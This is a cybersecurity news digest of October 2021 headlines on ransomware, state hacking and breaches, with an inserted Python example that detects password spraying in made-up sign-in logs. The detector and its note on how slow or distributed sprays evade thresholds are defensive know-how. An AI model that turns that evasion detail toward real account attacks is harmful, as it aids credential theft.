U.S. and Israeli Defense Tech Firms Targeted by Iranian Actors Full Text
Abstract
Iran-linked hackers were found conducting extensive password spraying attacks against Office 365 accounts of defense technology and global maritime firms in the U.S. and Israel. The group attempts to gain access to commercial satellite imagery and proprietary shipping plans/logs. Microsoft notifie ... Read MoreCyware Alerts - Hacker News
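Password spraying of the kind described above shows up in sign-in telemetry as one source trying a few passwords against many accounts, the inverse of a brute-force attack that hammers a single account. The Python below is an added example, not code from the article or from Microsoft; it runs a windowed detection over constructed sign-in records (not real Office 365 logs) with assumed field names and thresholds, and returns the source addresses that match the spray pattern.

```python
import csv
from collections import defaultdict
from datetime import datetime, timedelta
from io import StringIO

TIME_FMT = "%Y-%m-%dT%H:%M:%SZ"


def _build_sample_log() -> str:
    """Constructed sign-in records for the demonstration (not real telemetry).

    Field names are an assumption; real Office 365 / Azure AD exports carry
    more columns but the same information.
    """
    base = datetime(2021, 10, 18, 8, 0, 0)
    lines = ["time,src_ip,user,result"]
    for i in range(12):
        stamp = (base + timedelta(minutes=i)).strftime(TIME_FMT)
        # spray: one failure against each of twelve different accounts
        lines.append(f"{stamp},198.51.100.23,user{i:02d}@corp.example,FAILURE")
        # brute force: twelve failures against a single account
        lines.append(f"{stamp},203.0.113.9,bob@corp.example,FAILURE")
    # benign: a user mistypes twice, then succeeds
    lines.append("2021-10-18T08:05:00Z,192.0.2.5,alice@corp.example,FAILURE")
    lines.append("2021-10-18T08:05:30Z,192.0.2.5,alice@corp.example,FAILURE")
    lines.append("2021-10-18T08:06:00Z,192.0.2.5,alice@corp.example,SUCCESS")
    return "\n".join(lines) + "\n"


SAMPLE_LOG = _build_sample_log()


def parse_signins(text: str):
    """Parse CSV sign-in records into (timestamp, src_ip, user, result) tuples."""
    rows = []
    for rec in csv.DictReader(StringIO(text)):
        rows.append((datetime.strptime(rec["time"], TIME_FMT),
                     rec["src_ip"], rec["user"].casefold(), rec["result"]))
    return rows


def detect_password_spray(rows, window=timedelta(minutes=60),
                          min_users=10, max_attempts_per_user=3):
    """Flag source IPs that fail against many distinct accounts in one window.

    For each IP, slide a window over its failures (sorted by time). An IP is
    reported when a window holds at least `min_users` distinct accounts and
    no single account was tried more than `max_attempts_per_user` times:
    many accounts with few tries each is the spray signature, while many
    tries against one account is brute force and belongs to a different rule.
    Returns {src_ip: sorted list of targeted accounts}.
    """
    failures = defaultdict(list)
    for ts, ip, user, result in rows:
        if result == "FAILURE":
            failures[ip].append((ts, user))

    alerts = {}
    for ip, events in failures.items():
        events.sort()
        for start_idx, (start, _) in enumerate(events):
            attempts = defaultdict(int)
            for ts, user in events[start_idx:]:
                if ts - start > window:
                    break
                attempts[user] += 1
            if (len(attempts) >= min_users
                    and max(attempts.values()) <= max_attempts_per_user):
                alerts[ip] = sorted(attempts)
                break
    return alerts


if __name__ == "__main__":
    for ip, users in detect_password_spray(parse_signins(SAMPLE_LOG)).items():
        print(f"possible password spray from {ip}: "
              f"{len(users)} accounts, e.g. {users[:3]}")
```

The thresholds are starting points, not tuned values: a spray spread across many source addresses or stretched over days will slip under a 60-minute, 10-account window, so in practice the same grouping is also run per user-agent and per /24 and over longer windows, and single-account brute force is caught by a separate lockout rule.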
October 18, 2021 – Outage
Sinclair TV stations downtime allegedly caused by a ransomware attack Full Text
Abstract
A ransomware attack is likely the cause of the recent downtime for TV stations owned by the Sinclair Broadcast Group; the stations went down over the weekend, officially due to technical...Security Affairs
October 18, 2021 – Vulnerabilities
Microsoft asks admins to patch PowerShell to fix WDAC bypass Full Text
Abstract
Microsoft has asked system administrators to patch PowerShell 7 against two vulnerabilities allowing attackers to bypass Windows Defender Application Control (WDAC) enforcements and gain access to plain text credentials.BleepingComputer
October 18, 2021 – Outage
Update: Ecuador’s Banco Pichincha has yet to recover after recent cyberattack Full Text
Abstract
The bank issued a statement on Monday to inform customers about the cyberattack, it also added to have “identified a cybersecurity incident in our systems that has partially disabled our services.”Security Affairs
October 18, 2021 – Criminals
REvil ransomware operation shuts down once again Full Text
Abstract
The REvil ransomware operation appears to have shut down once again after an unknown threat actor hijacked its Tor hidden services, including its leak site.Security Affairs
October 18, 2021 – Vulnerabilities
Credit card PINs can be guessed even when covering the ATM pad Full Text
Abstract
Researchers have proven it's possible to train a special-purpose deep-learning algorithm that can guess 4-digit card PINs 41% of the time, even if the victim is covering the pad with their hands.BleepingComputer
October 18, 2021 – Malware
Bugs in malware create ‘backdoors’ for security researchers Full Text
Abstract
New research from cloud security firm Zscaler, presented at the recent VB2021 conference, exploits bugs and coding errors in malware code to thwart infections by botnets, ransomware, and trojans.The Daily Swig
October 18, 2021 – Malware
Experts spotted an Ad-Blocking Chrome extension injecting malicious ads Full Text
Abstract
Researchers from Imperva have spotted a new deceptive ad injection campaign in which an ad-blocking Chrome extension was abused by threat actors to inject ads into Google search pages, targeting users of some large websites.Security Affairs
October 18, 2021 – Outage
Sinclair TV stations crippled by weekend ransomware attack Full Text
Abstract
TV stations owned by the Sinclair Broadcast Group broadcast television company went down over the weekend across the US, with multiple sources telling BleepingComputer the downtime was caused by a ransomware attack.BleepingComputer
October 18, 2021 – Solution
Password Auditing Tool L0phtCrack Released as Open Source Full Text
Abstract
First released in 1997, the L0phtCrack tool can be used to test password strength and recover lost Windows passwords via dictionary, brute-force, and other types of attacks.Security Week
October 18, 2021 – Breach
Update: Accenture Confirms Data Stolen in Ransomware Attack Full Text
Abstract
In a Form 10-K filing with the Securities and Exchange Commission (SEC) last week, the company confirmed that the attackers were able to steal some proprietary information from its servers.Security Week
October 18, 2021 – General
Critical infrastructure security dubbed ‘abysmal’ by researchers Full Text
Abstract
It was only last month that the Port of Houston fended off a cyberattack and there is no reason to believe cyberattacks on OT systems won't continue -- or, perhaps, become more common.ZDNet
October 17, 2021 – Criminals
REvil Ransomware Gang Goes Underground After Tor Sites Were Compromised Full Text
Abstract
REvil, the notorious ransomware gang behind a string of cyberattacks in recent years, appears to have gone off the radar once again, a little over a month after the cybercrime group staged a surprise return following a two-month-long hiatus. The development, first spotted by Recorded Future's Dmitry Smilyanets , comes after a member affiliated with the REvil operation posted on the XSS hacking forum that unidentified actors had taken control of the gang's Tor payment portal and data leak website. "The server was compromised and they were looking for me. To be precise, they deleted the path to my hidden service in the torrc file and raised their own so that I would (sic) go there. I checked on others - this was not. Good luck everyone, I'm off," user 0_neday said in the post. As of writing, it isn't clear exactly who was behind the compromise of REvil's servers, although it wouldn't be entirely surprising if law enforcement agencies played a rThe Hacker News
October 17, 2021 – Education
Is Your Data Safe? Check Out Some Cybersecurity Master Classes Full Text
Abstract
Since cybersecurity is definitely an issue that's here to stay, I've just checked out the recently released first episodes of Cato Networks Cybersecurity Master Class Series . According to Cato, the series aims to teach and demonstrate cybersecurity tools and best practices; provide research and real-world case studies on cybersecurity; and bring the voices and opinions of top cybersecurity thought-leaders. Designed for security and IT professionals, C-level managers and security experts, each session contains both theory and hands-on examples about strategic, tactical, and operational issues on a wide range of topics. The classes are hosted by industry-recognized cybersecurity researcher and keynote speaker, Etay Maor, who is also Senior Director of Security Strategy at Cato. Four out of the planned annual 8-10 episodes are currently available online. Episode 1 , entitled How (and Why) to Apply OSINT to Protect your Enterprise takes an in-depth look at our era of data proliThe Hacker News
October 17, 2021 – Vulnerabilities
Windows 10, Linux, iOS, Chrome and Many Others Hacked at Tianfu Cup 2021 Full Text
Abstract
Windows 10, iOS 15, Google Chrome, Apple Safari, Microsoft Exchange Server, and Ubuntu 20 were successfully broken into using original, never-before-seen exploits at the Tianfu Cup 2021, the fourth edition of the international cybersecurity contest held in the city of Chengdu, China. Targets this year included Google Chrome running on Windows 10 21H1, Apple Safari running on Macbook Pro, Adobe PDF Reader, Docker CE, Ubuntu 20/CentOS 8, Microsoft Exchange Server 2019, Windows 10, VMware Workstation, VMware ESXi, Parallels Desktop, iPhone 13 Pro running iOS 15, domestic mobile phones running Android, QEMU VM, Synology DS220j DiskStation, and ASUS RT-AX56U router. The Chinese version of Pwn2Own was started in 2018 in the wake of government regulation in the country that barred security researchers from participating in international hacking competitions because of national security concerns. With the exception of Synology DS220j NAS, Xiaomi Mi 11 smartphone, and an unnamed ChineThe Hacker News
October 17, 2021 – Outage
REvil ransomware shuts down again after Tor sites were hijacked Full Text
Abstract
The REvil ransomware operation has likely shut down once again after an unknown person hijacked their Tor payment portal and data leak blog.BleepingComputer
October 17, 2021 – Government
Avoid Using Wildcard TLS Certificates, Warns NSA Full Text
Abstract
The NSA cautioned organizations against the use of wildcard TLS certificates, which can widen the impact of a single server compromise across an organization and also expose it to the new ALPACA TLS attack. According to researchers, around 119,000 web servers are still exposed to the new ALPACA attacks.Cyware Alerts - Hacker News
October 17, 2021 – Hacker
Experts hacked a fully patched iOS 15 running on iPhone 13 at China’s Tianfu Cup hacking contest Full Text
Abstract
White hat hackers earned $1.88 million at the Tianfu Cup, the most important hacking contest held in China, by demonstrating vulnerabilities in popular software.Security Affairs
October 17, 2021 – Malware
Fake Android Apps Steal Credentials from Japanese Telecom Users Full Text
Abstract
An Android-based phishing campaign was observed targeting customers of telecommunication services based in Japan. The malware-laced fake app steals credentials and session cookies. Experts recommend avoiding such risks by not downloading apps from unknown third-party stores.Cyware Alerts - Hacker News
October 17, 2021 – Breach
Twitch security breach had minimal impact, the company states Full Text
Abstract
Twitch provided an update on the recent security breach, confirming that it had only a limited impact on a small number of users.Security Affairs
October 17, 2021 – Botnet
TrickBot’s FIN12 is Claiming Victims at Higher Rate Full Text
Abstract
New Mandiant report claims FIN12 has been dropping Ryuk ransomware rapidly across multiple sectors, with one in five victims in the healthcare sector. It targets organizations that have annual revenues over $300 million, with an average of almost $6 billion. The report found that the average time F ... Read MoreCyware Alerts - Hacker News
October 17, 2021 – Outage
Ecuador’s Banco Pichincha has yet to recover after recent cyberattack Full Text
Abstract
The customers of Banco Pichincha, the largest bank in Ecuador, are still experiencing service disruptions after a massive cyberattack hit the financial organization early this week. The cyberattack took place over the last weekend and forced the bank...Security Affairs
October 16, 2021 – Cryptocurrency
$5.2 billion in BTC transactions tied to top 10 ransomware variants: US Treasury Full Text
Abstract
FinCen said the total value of suspicious activity reported in ransomware-related SARs during the first six months of 2021 was $590 million, which exceeds the $416 million reported for all of 2020.ZDNet
October 16, 2021 – Botnet
Trickbot spreads malware through new distribution channels Full Text
Abstract
TrickBot operators are back and are expanding their distribution channels through partnerships with cybercrime affiliates. The operators behind the infamous TrickBot malware (tracked as ITG23 and Wizard Spider) have resurfaced with new distribution channels to deliver malicious...Security Affairs
October 16, 2021 – General
Critical infrastructure security dubbed ‘abysmal’ by researchers Full Text
Abstract
CloudSEK published a new report exploring ICSs and their security posture in light of recent cyberattacks against the industrial, utility, and manufacturing targets. The research focuses on ICSs available through the internet.ZDNet
October 16, 2021 – APT
Russia-Linked TA505 targets financial institutions in a new malspam campaign Full Text
Abstract
Russia-linked TA505 group (aka Evil Corp) leverages a lightweight Office file to spread malware in a campaign, tracked as MirrorBlast, aimed at financial institutions.Security Affairs
October 16, 2021 – Hacker
Researchers Disclose New Side-Channel Attacks Affecting All AMD CPUs Full Text
Abstract
Researchers have disclosed the details of new timing and power-based side-channel attacks that affect all CPUs made by AMD, but the chipmaker says no new mitigations are necessary.Security Week
October 16, 2021 – General
US Treasury FinCEN linked $5.2 billion in BTC transactions to ransomware payments Full Text
Abstract
The U.S. Treasury Department's Financial Crimes Enforcement Network (FinCEN) linked roughly $5.2 billion worth of Bitcoin transactions to ransomware payments.Security Affairs
October 16, 2021 – Breach
Amazon-owned Twitch says source code exposed in last week’s data breach Full Text
Abstract
Amazon.com Inc-owned Twitch has said that last week’s data breach at the live streaming e-sports platform contained documents from its source code. Twitch said it was “confident” the incident affected only a small number of users.Reuters
October 16, 2021 – Vulnerabilities
Juniper Networks Patches Over 70 Vulnerabilities Full Text
Abstract
Networking and cybersecurity solutions provider Juniper Networks this week released more than 40 security advisories to describe over 70 vulnerabilities that affect the company’s products.Security Week
October 15, 2021 – General
The Week in Ransomware - October 15th 2021 - Disrupting ransoms Full Text
Abstract
This week, senior officials from over thirty countries held virtual conferences on disrupting ransomware operations and attacks.BleepingComputer
October 15, 2021 – Cryptocurrency
NFT Marketplace OpenSea Patches Flaw Potentially Leading to Cryptocurrency Theft Full Text
Abstract
OpenSea, the world’s largest NFT marketplace, has addressed a security vulnerability that could have allowed hackers to hijack user accounts and empty their crypto wallets with the help of maliciously crafted NFTs (non-fungible tokens).Security Week
October 15, 2021 – General
Treasury: $590M paid out by victims of ransomware attacks in first half of 2021 Full Text
Abstract
A report released by the Treasury Department Friday found that around $590 million had been paid by victims of ransomware to their attackers in the first six months of 2021, as such attacks skyrocketed.The Hill
October 15, 2021 – Botnet
Attackers Behind Trickbot Expanding Malware Distribution Channels Full Text
Abstract
The operators behind the pernicious TrickBot malware have resurfaced with new tricks that aim to increase its foothold by expanding its distribution channels, ultimately leading to the deployment of ransomware such as Conti. The threat actor, tracked under the monikers ITG23 and Wizard Spider, has been found to partner with other cybercrime gangs known as Hive0105, Hive0106 (aka TA551 or Shathak), and Hive0107, adding to a growing number of campaigns that the attackers are banking on to deliver proprietary malware, according to a report by IBM X-Force. "These and other cybercrime vendors are infecting corporate networks with malware by hijacking email threads, using fake customer response forms and social engineering employees with a fake call center known as BazarCall," researchers Ole Villadsen and Charlotte Hammond said. Since emerging on the threat landscape in 2016, TrickBot has evolved from a banking trojan to a modular Windows-based crimeware solution, while alsoThe Hacker News
October 15, 2021 – Privacy
Bugs in Our Pockets: The Risks of Client-Side Scanning Full Text
Abstract
Client-side scanning poses serious technical risks, and there is little that prevents such systems from being repurposed to scan for other types of targeted content.Lawfare
October 15, 2021 – Breach
Accenture discloses data breach after LockBit ransomware attack Full Text
Abstract
Global IT consultancy giant Accenture confirmed a data breach following the ransomware attack conducted by LockBit operators in August 2021.Security Affairs
October 15, 2021 – Cryptocurrency
US links $5.2 billion worth of Bitcoin transactions to ransomware Full Text
Abstract
The U.S. Treasury Department's Financial Crimes Enforcement Network (FinCEN) has identified roughly $5.2 billion worth of outgoing Bitcoin transactions likely tied to the top 10 most commonly reported ransomware variants.BleepingComputer
October 15, 2021 – Botnet
This malware botnet gang has stolen millions with a surprisingly simple trick Full Text
Abstract
The long-running botnet known as MyKings is still in business and has raked in at least $24.7 million by using its network of compromised computers to mine for cryptocurrencies.ZDNet
October 15, 2021 – Malware
Ad-Blocking Chrome Extension Caught Injecting Ads in Google Search Pages Full Text
Abstract
A new deceptive ad injection campaign has been found leveraging an ad blocker extension for Google Chrome and Opera web browsers to sneakily insert ads and affiliate codes on websites, according to new research from cybersecurity firm Imperva. The findings come following the discovery of rogue domains distributing an ad injection script in late August 2021 that the researchers connected to an add-on called AllBlock. The extension has since been pulled from both the Chrome Web Store and Opera add-ons marketplaces. While AllBlock is designed to block ads legitimately, the JavaScript code is injected into every new tab opened on the browser. It works by identifying and sending all links in a web page — typically on search engine results pages — to a remote server, which responds back with a list of websites to replace the genuine links with, leading to a scenario where upon clicking a link, the victim is redirected to a different page. "When the user clicks on any modified liThe Hacker News
October 15, 2021 – Vulnerabilities
Juniper Networks released +40 security advisories to fix +70 vulnerabilities Full Text
Abstract
Cybersecurity provider Juniper Networks released more than 40 security advisories to address over 70 vulnerabilities that affect its products.Security Affairs
October 15, 2021 – Attack
Twitch downplays this month’s hack, says it had minimal impact Full Text
Abstract
In an update regarding this month's security incident, Twitch downplayed the breach saying that it had minimal impact and it only affected a small number of users.BleepingComputer
October 15, 2021 – Ransomware
BlackByte: Free Decryptor Released for Ransomware Strain Full Text
Abstract
Trustwave, a Chicago-based cybersecurity and managed security services provider owned by Singaporean telecommunications company Singtel Group Enterprise, on Friday announced the release of the free decryptor, available for download from GitHub.Gov Info Security
October 15, 2021 – Government
CISA Issues Warning On Cyber Threats Targeting Water and Wastewater Systems Full Text
Abstract
The U.S. Cybersecurity Infrastructure and Security Agency (CISA) on Thursday warned of continued ransomware attacks aimed at disrupting water and wastewater facilities (WWS), highlighting five incidents that occurred between March 2019 and August 2021. "This activity—which includes attempts to compromise system integrity via unauthorized access—threatens the ability of WWS facilities to provide clean, potable water to, and effectively manage the wastewater of, their communities," CISA, along with the Federal Bureau of Investigation (FBI), the Environmental Protection Agency (EPA), and the National Security Agency (NSA), said in a joint bulletin. Citing spear-phishing, outdated operating systems and software, and control system devices running vulnerable firmware versions as the primary intrusion vectors, the agencies singled out five different cyber attacks from 2019 to early 2021 targeting the WWS Sector — A former employee at Kansas-based WWS facility unsuccessfullyThe Hacker News
October 15, 2021 – Attack
Boffins devise a new side-channel attack affecting all AMD CPUs Full Text
Abstract
A group of researchers from the Graz University of Technology (including Moritz Lipp and Daniel Gruss) and the CISPA Helmholtz Center for Information Security devised a new side-channel attack that affects AMD CPUs.Security Affairs
October 15, 2021 – Breach
Accenture confirms data breach after August ransomware attack Full Text
Abstract
Global IT consultancy giant Accenture confirmed that LockBit ransomware operators stole data from its systems during an attack that hit the company's systems in August 2021.BleepingComputer
October 15, 2021 – Attack
Verizon-owned Visible Acknowledges Hack, Confirms Account Manipulations Full Text
Abstract
The company came forward and confirmed the attack in a Twitter thread, writing that it was "aware of an issue in which some member accounts were accessed and/or charged without their authorization."ZDNet
October 15, 2021 – Attack
Three more ransomware attacks hit Water and Wastewater systems in 2021 Full Text
Abstract
A joint cybersecurity advisory published today by the FBI, NSA, CISA, and the EPA revealed three more ransomware attacks launched against water and wastewater systems this year.Security Affairs
October 15, 2021 – Criminals
Russian cybercrime gang targets finance firms with stealthy macros Full Text
Abstract
A new phishing campaign dubbed MirrorBlast is deploying weaponized Excel documents that are extremely difficult to detect in order to compromise financial service organizations.BleepingComputer
October 15, 2021 – Government
CISA Outlines Cyberthreats Targeting US Water and Wastewater Systems Full Text
Abstract
Cybersecurity company Dragos worked with CISA, the FBI, the NSA and the EPA to outline cyberthreats targeting the information and operational technology underpinning the networks, systems and devices of US water and wastewater facilities.ZDNet
October 15, 2021 – Government
Governments worldwide to crack down on ransomware payment channels Full Text
Abstract
Senior officials from 31 countries and the European Union said that their governments would take action to disrupt the cryptocurrency payment channels used by ransomware gangs to finance their operations.BleepingComputer
October 15, 2021 – Privacy
Cybersecurity Experts Sound Alarm on Apple and E.U. Phone Scanning Plans Full Text
Abstract
More than a dozen prominent cybersecurity experts raised concerns on plans by Apple and the EU to monitor people’s phones for illicit material, calling the efforts ineffective and dangerous strategies that would embolden government surveillance.New York Times
October 15, 2021 – Government
US government discloses more ransomware attacks on water plants Full Text
Abstract
U.S. Water and Wastewater Systems (WWS) Sector facilities have been breached multiple times in ransomware attacks during the last two years, according to a joint advisory published by US government agencies on Thursday.BleepingComputer
October 15, 2021 – Malware
Adblocker promises to block ads, injects them instead Full Text
Abstract
Researchers at Imperva uncovered a new ad injection campaign based on an adblocker named AllBlock. The AllBlock extension was available at the time of writing for Chrome and Opera in the respective web stores.Malwarebytes Labs
October 14, 2021 – Solution
WhatsApp rolls out iOS, Android end-to-end encrypted chat backups Full Text
Abstract
WhatsApp is rolling out end-to-end encrypted chat backups on iOS and Android to prevent anyone from accessing your chats, regardless of where they are stored.BleepingComputer
October 14, 2021 – Attack
Israeli Hospital Forced to Cancel Non-Urgent Procedures Due to Ransomware Attack Full Text
Abstract
Israel’s National Cyber Directorate (INCD) is urging organizations across the country to bolster their cyber defenses following a disruptive ransomware attack against a hospital in Israel’s northwest.The Daily Swig
October 14, 2021 – Government
Agencies warn of cyber threats to water, wastewater systems Full Text
Abstract
A coalition of federal agencies on Thursday warned that hackers are targeting the water and wastewater treatment sectors, strongly recommending that organizations take steps to protect themselves.The Hill
October 14, 2021 – Hacker
Google: We’re Tracking 270 State-Sponsored Hacker Groups From Over 50 Countries Full Text
Abstract
Google's Threat Analysis Group (TAG) on Thursday said it's tracking more than 270 government-backed threat actors from more than 50 countries, adding it has sent approximately 50,000 alerts of state-sponsored phishing or malware attempts to customers since the start of 2021. The warnings mark a 33% increase from 2020, the internet giant said, with the spike largely stemming from "blocking an unusually large campaign from a Russian actor known as APT28 or Fancy Bear." Additionally, Google said it disrupted a number of campaigns mounted by an Iranian state-sponsored attacker group tracked as APT35 (aka Charming Kitten, Phosphorous, or Newscaster), including a sophisticated social engineering attack dubbed "Operation SpoofedScholars" aimed at think tanks, journalists, and professors with an aim to solicit sensitive information by masquerading as scholars with the University of London's School of Oriental and African Studies (SOAS). Details of thThe Hacker News
October 14, 2021 – Encryption
WhatsApp made available end-to-end encrypted chat backups Full Text
Abstract
WhatsApp made available end-to-end encrypted chat backups on iOS and Android to prevent anyone from accessing user chats. WhatsApp is rolling out end-to-end encrypted chat backups on both iOS and Android devices, the move aims at implementing an optional...Security Affairs
October 14, 2021 – Vulnerabilities
Rickroll Grad Prank Exposes Exterity IPTV Bug Full Text
Abstract
IPTV and IP video security is increasingly under scrutiny, even by high school kids.Threatpost
October 14, 2021 – Solution
Microsoft releases Linux version of the Windows Sysmon tool Full Text
Abstract
Microsoft has released a Linux version of the very popular Sysmon system monitoring utility for Windows, allowing Linux administrators to monitor devices for malicious activity.BleepingComputer
October 14, 2021 – Vulnerabilities
Intel, VMware Join Patch Tuesday Parade Full Text
Abstract
Intel released two advisories to fix privilege escalation and information disclosure vulnerabilities in the SGX software development kit and Hardware Accelerated Execution Manager software products.Security Week
October 14, 2021 – Government
World leaders recognize ransomware attacks as ‘global security threat’ Full Text
Abstract
Government cybersecurity leaders from the United States and more than 30 countries on Thursday formally recognized ransomware attacks as an "escalating global security threat,” and pledged greater cooperation and diplomacy in fighting against these incidents.The Hill
October 14, 2021 – Education
The Ultimate SaaS Security Posture Management (SSPM) Checklist Full Text
Abstract
Cloud security is the umbrella that holds within it IaaS, PaaS and SaaS. Gartner created the SaaS Security Posture Management (SSPM) category for solutions that continuously assess security risk and manage the SaaS applications' security posture. With enterprises having 1,000 or more employees relying on dozens to hundreds of apps, the need for deep visibility and remediation for SaaS security settings is only getting more critical. The top pain points for SaaS security stem from: lack of control over the growing SaaS app estate; lack of governance in the lifecycle of SaaS apps, from purchase to deployment, operation and maintenance; lack of visibility of all the configurations in the SaaS app estate; a skills gap in ever-evolving, accelerating, complex cloud security; and the laborious and overwhelming workload of staying on top of hundreds to thousands (to tens of thousands) of settings and permissions. The capability of governance across the whole SaaS estate is both nuanced and complThe Hacker News
October 14, 2021 – General
Since 2020, at least 130 different ransomware families have been active Full Text
Abstract
The popular Google’s VirusTotal scanning service has published an interesting analysis of more than 80 Million ransomware samples. VirusTotal has published its first ransomware activity report based on the analysis of more than 80 million samples...Security Affairs
October 14, 2021 – General
Podcast: 67% of Orgs Have Been Hit by Ransomware at Least Once Full Text
Abstract
Fortinet’s Derek Manky discusses a recent global survey showing that two-thirds of organizations suffered at least one ransomware attack, while half were hit multiple times.Threatpost
October 14, 2021 – Outage
University of Sunderland announces outage following cyberattack Full Text
Abstract
The University of Sunderland in the UK has announced extensive operational issues that have taken most of its IT systems down, attributing the problem to a cyber-attack.BleepingComputer
October 14, 2021 – Business
Cyber Insurance Firm At-Bay Announces $20 Million Series D Extension Full Text
Abstract
The new injection of capital came from ION Crossover Partners, which joins Series D investors Icon Ventures, Lightspeed Venture Partners, Acrew Capital, Khosla Ventures, and M12, and others.Security Week
October 14, 2021 – Government
House Democrats announce bill to rein in tech algorithms Full Text
Abstract
Top Democrats on the House Energy and Commerce Committee on Thursday announced legislation aimed at holding online platforms accountable for content promoted by their algorithms.The Hill
October 14, 2021 – Vulnerabilities
Critical Remote Hacking Flaws Disclosed in Linphone and MicroSIP Softphones Full Text
Abstract
Multiple security vulnerabilities have been disclosed in softphone software from Linphone and MicroSIP that could be exploited by an unauthenticated remote adversary to crash the client and even extract sensitive information like password hashes by simply making a malicious call. The vulnerabilities, which were discovered by Moritz Abrell of German pen-testing firm SySS GmbH, have since been addressed by the respective manufacturers following responsible disclosure. Softphones are essentially software-based phones that mimic desk phones and allow for making telephone calls over the Internet without the need for using dedicated hardware. At the core of the issues are the SIP services offered by the clients to connect two peers to facilitate telephony services in IP-based mobile networks. SIP aka Session Initiation Protocol is a signaling protocol that's used to control interactive communication sessions, such as voice, video, chat and instant messaging, as well as games and vThe Hacker News
October 14, 2021 – General
Google sent over 50,000 warnings of state-sponsored attacks, +33% from same period in 2020 Full Text
Abstract
Google revealed that it has sent roughly 50,000 alerts of state-sponsored phishing or hacking attempts to customers since January. Google announced that it has sent roughly 50,000 alerts of state-sponsored phishing or hacking attempts to customers during...Security Affairs
October 14, 2021 – Phishing
DocuSign phishing campaign targets low-ranking employees Full Text
Abstract
Phishing actors are following a new trend of targeting non-executive employees who nonetheless have access to valuable areas within an organization.BleepingComputer
October 14, 2021 – Phishing
“Free Steam game” scams on TikTok are Among Us Full Text
Abstract
The scammers are claiming to offer up free versions of the incredibly popular Among Us game. However, they also claim to have special hacked versions up for grabs that allow players to cheat.Malwarebytes Labs
October 14, 2021 – General
VirusTotal Releases Ransomware Report Based on Analysis of 80 Million Samples Full Text
Abstract
As many as 130 different ransomware families have been found to be active in 2020 and the first half of 2021, with Israel, South Korea, Vietnam, China, Singapore, India, Kazakhstan, Philippines, Iran, and the U.K. emerging as the most affected territories, a comprehensive analysis of 80 million ransomware-related samples has revealed. Google's cybersecurity arm VirusTotal attributed a significant chunk of the activity to the GandCrab ransomware-as-a-service (RaaS) group (78.5%), followed by Babuk (7.61%), Cerber (3.11%), Matsnu (2.63%), Wannacry (2.41%), Congur (1.52%), Locky (1.29%), Teslacrypt (1.12%), Rkor (1.11%), and Reveon (0.70%). "Attackers are using a range of approaches, including well-known botnet malware and other Remote Access Trojans (RATs) as vehicles to deliver their ransomware," VirusTotal Threat Intelligence Strategist Vicente Diaz said . "In most cases, they are using fresh or new ransomware samples for their campaigns." Some of the othThe Hacker News
October 14, 2021 – Attack
For the first time, an Israeli hospital was hit by a major ransomware attack Full Text
Abstract
The Hillel Yaffe Medical Center in Hadera, Israel, was hit by a ransomware attack that was defined by Israel's National Cyber Directorate as a "major" attack. The Hillel Yaffe Medical Center in Hadera, Israel was hit by a ransomware attack that impacted...Security Affairs
October 14, 2021 – General
Google sent 50,000 warnings of state-sponsored attacks in 2021 Full Text
Abstract
Google said today that it sent roughly 50,000 alerts of state-sponsored phishing or hacking attempts to customers during 2021, a considerable increase compared to the previous year.BleepingComputer
October 14, 2021 – Breach
Data of 228,000 Subscribers of Thingiverse Circulated on Hacker Forum Full Text
Abstract
Thingiverse, a site for sharing user-created digital design files, has reportedly leaked a 36GB backup file that contains 228,000 unique email addresses and other personally identifiable information.Info Risk Today
October 14, 2021 – Vulnerabilities
Experts Warn of Unprotected Prometheus Endpoints Exposing Sensitive Information Full Text
Abstract
A large-scale unauthenticated scraping of publicly available and non-secured endpoints from older versions of the Prometheus event monitoring and alerting solution could be leveraged to inadvertently leak sensitive information, according to the latest research. "Due to the fact that authentication and encryption support is relatively new, many organizations that use Prometheus haven't yet enabled these features and thus many Prometheus endpoints are completely exposed to the Internet (e.g. endpoints that run earlier versions), leaking metric and label data," JFrog researchers Andrey Polkovnychenko and Shachar Menashe said in a report. Prometheus is an open-source system monitoring and alerting toolkit used to collect and process metrics from different endpoints, alongside enabling easy observation of software metrics such as memory usage, network usage, and software-specific defined metrics, such as the number of failed logins to a web application. Support for TransportThe Hacker News
October 14, 2021 – Breach
Acer suffered the second security breach in a few months Full Text
Abstract
Taiwanese electronics technology giant Acer discloses a security breach suffered by its after-sales service systems in India after an isolated attack. Bad news for the Taiwanese electronics technology giant Acer, it disclosed a second security breach...Security Affairs
October 14, 2021 – Malware
Malicious Chrome ad blocker injects ads behind the scenes Full Text
Abstract
The AllBlock Chromium ad blocking extension has been found to be injecting hidden affiliate links that generate commissions for the developers.BleepingComputer
October 14, 2021 – Botnet
Trickbot Continues to Stay Strong Despite the Recent Arrest of Gang Members Full Text
Abstract
Ever since its re-emergence following the major takedown in 2020, the operators have released new and more persistent versions of the malware to claim successful attacks on victims.Cyware Alerts - Hacker News
October 14, 2021 – Attack
New Yanluowang ransomware used in highly targeted attacks on large orgs Full Text
Abstract
Researchers spotted a new strain of ransomware, dubbed Yanluowang, that was used in highly targeted attacks against enterprises. Researchers from Symantec's Threat Hunter Team discovered a ransomware family, tracked as Yanluowang, that was used...Security Affairs
October 14, 2021 – Breach
Acer confirms breach of after-sales service systems in India Full Text
Abstract
Taiwanese computer giant Acer has confirmed that its after-sales service systems in India were recently breached in what the company called "an isolated attack."BleepingComputer
October 14, 2021 – Botnet
Freakout Botnet Unleashes a New Bunch of Attacks Full Text
Abstract
Towards the end of September 2021, researchers at Juniper Threat Labs observed new activity from FreakOut aka 3Cr0m0rPh that resulted in the takeover of Visual Tools DVR.Cyware Alerts - Hacker News
October 14, 2021 – Attack
New Yanluowang ransomware used in targeted enterprise attacks Full Text
Abstract
A new, still-under-development ransomware strain is being used in highly targeted attacks against enterprise entities, Broadcom's Symantec Threat Hunter Team discovered.BleepingComputer
October 13, 2021 – Cryptocurrency
OpenSea ‘Free Gift’ NFTs Drain Cryptowallet Balances Full Text
Abstract
Cybercriminals exploited bugs in the world’s largest digital-goods marketplace to create malicious artwork offered as a perk to unsuspecting users.Threatpost
October 13, 2021 – Botnet
MyKings botnet still active and making massive amounts of money Full Text
Abstract
The MyKings botnet (aka Smominru or DarkCloud) is still actively spreading, making massive amounts of money in crypto, five years after it first appeared in the wild.BleepingComputer
October 13, 2021 – Malware
New FontOnLake Malware Cripples Linux Systems Full Text
Abstract
ESET unearthed a new malware strain, dubbed FontOnLake, that targets Linux systems and appears to have claimed a limited number of victims in Southeast Asia. The malware appears to be stealthy and advanced in design. Security teams are advised to proactively prepare their defenses against ...Cyware Alerts - Hacker News
October 13, 2021 – Education
Johns Hopkins to launch degree program in cybersecurity and policy Full Text
Abstract
